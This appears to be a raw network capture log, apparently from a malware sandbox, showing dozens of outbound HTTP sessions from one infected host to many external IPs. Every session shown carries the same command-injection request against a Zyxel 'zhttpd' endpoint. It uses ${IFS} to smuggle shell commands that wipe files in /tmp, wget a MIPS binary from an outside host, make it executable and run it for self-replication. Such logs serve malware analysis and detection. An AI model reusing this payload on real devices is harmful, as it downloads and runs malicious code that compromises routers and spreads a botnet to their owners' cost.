                                                Jan 28, 2024 10:16:32.926143885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6396192.168.2.2356832181.43.25.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926157951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6397192.168.2.2353898145.114.254.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926202059 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6398192.168.2.234822653.108.61.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926224947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6399192.168.2.235298259.15.169.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926239014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6400192.168.2.235109049.12.70.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926270962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6401192.168.2.234941481.151.132.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926297903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6402192.168.2.2358054177.131.204.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926315069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6403192.168.2.2355714206.47.74.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926358938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6404192.168.2.233646078.128.212.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926393032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6405192.168.2.2333564159.147.155.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926424026 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6406192.168.2.235270680.64.86.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926450968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6407192.168.2.2351068106.56.180.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926469088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6408192.168.2.234996824.195.62.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926489115 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6409192.168.2.2334848184.244.126.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926539898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6410192.168.2.235043299.170.153.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926548958 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6411192.168.2.2343754140.80.183.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926574945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6412192.168.2.2337612125.15.230.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926606894 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6413192.168.2.235798460.165.235.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926645994 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6414192.168.2.234403471.41.189.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926677942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6415192.168.2.2356196129.46.240.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926698923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6416192.168.2.2355132126.123.4.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926734924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6417192.168.2.2351662101.67.160.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926774025 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6418192.168.2.235585220.81.99.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926790953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6419192.168.2.2338794178.48.45.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926830053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6420192.168.2.235591417.71.170.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926858902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6421192.168.2.2349998191.47.162.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926886082 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6422192.168.2.2339616182.35.200.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926919937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6423192.168.2.2356682116.57.90.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926949024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6424192.168.2.2342182105.160.64.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.926965952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6425192.168.2.2356070188.126.173.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927006006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6426192.168.2.233386249.64.19.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927036047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6427192.168.2.2345246137.56.175.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927062988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6428192.168.2.234257272.14.145.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927081108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6429192.168.2.2334684169.71.123.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927102089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6430192.168.2.2359660176.165.206.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927141905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6431192.168.2.2336944187.70.53.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927165985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6432192.168.2.2360982169.110.133.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927192926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6433192.168.2.235129837.217.184.118443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927254915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6434192.168.2.234494027.242.38.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927267075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6435192.168.2.2348632163.18.220.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927294016 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6436192.168.2.2356458145.0.235.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927311897 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6437192.168.2.2352008173.165.245.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927345037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6438192.168.2.2359780104.93.228.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927360058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6439192.168.2.23328788.62.122.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927416086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6440192.168.2.2342596176.241.127.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927423000 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6441192.168.2.2349920212.155.160.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927460909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6442192.168.2.2349736183.66.54.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927478075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6443192.168.2.2339746158.215.22.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927516937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6444192.168.2.234662258.105.105.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927517891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6445192.168.2.2340300119.116.41.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927556992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6446192.168.2.2341866133.9.20.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927614927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6447192.168.2.2347018149.161.46.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927623034 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6448192.168.2.2339146124.30.253.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927644968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6449192.168.2.2350278139.31.37.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927705050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6450192.168.2.2344540207.65.198.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927722931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6451192.168.2.2347730162.238.193.75443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927757978 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6452192.168.2.2352386148.34.134.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927783012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6453192.168.2.2333556184.90.72.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.927840948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6454192.168.2.233909225.9.49.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.930128098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6455192.168.2.235900271.34.181.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.930151939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6456192.168.2.2338640122.117.202.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:32.930201054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6457192.168.2.2358390200.139.129.75443
                                                TimestampBytes transferredDirectionData
